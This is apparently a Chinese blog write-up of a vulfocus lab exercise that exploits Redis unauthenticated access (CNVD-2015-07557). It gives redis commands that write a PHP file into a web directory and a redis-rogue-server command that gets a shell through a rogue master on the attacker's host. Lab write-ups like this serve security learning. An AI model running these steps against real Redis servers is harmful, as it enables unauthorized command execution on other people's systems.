vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

目标系统的权限不够redis 用户无法写计划任务和公钥,而且也没有开放ssh端口。

主从复制getshell,写入恶意的so文件达到执行系统命令的目的。

github上有一键可以利用的脚本

https://github.com/n0b0dyCN/redis-rogue-server.git

利用条件:需要web目录有读写权限,只有读权限会失败

工具连接:redis-rogue-server

向目标写入文件(前提是目标有网站)

config set dir /tmp #创建临时目录

config set dbfilename 1.php #写入文件

set test "<?php phpinfo(); ?>" #向文件中写入内容

bgsave #保存

save #保存

证明web目录具有写权限,可以进行利用

确认靶机有可写权限后,

利用:攻击机进入到cd redis-rogue-server文件夹里面

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP

成功后,可以执行命令

ls /tmp即可得到flag

相关推荐
feifeigo12313 分钟前
升级到MySQL 8.4,MySQL启动报错:io_setup() failed with EAGAIN
数据库·mysql·adb
weixin_446122461 小时前
JAVA内存区域划分
java·开发语言·redis
火龙谷2 小时前
【nosql】有哪些非关系型数据库?
数据库·nosql
TT哇2 小时前
JavaEE==网站开发
java·redis·java-ee
焱焱枫3 小时前
Oracle获取执行计划之10046 技术详解
数据库·oracle
qq_392397124 小时前
Redis常用操作
数据库·redis·wpf
一只叫煤球的猫5 小时前
真实事故复盘:Redis分布式锁居然失效了?公司十年老程序员踩的坑
java·redis·后端
一只fish6 小时前
MySQL 8.0 OCP 1Z0-908 题目解析(17)
数据库·mysql
花好月圆春祺夏安6 小时前
基于odoo17的设计模式详解---装饰模式
数据库·python·设计模式
A__tao6 小时前
SQL 转 Java 实体类工具
java·数据库·sql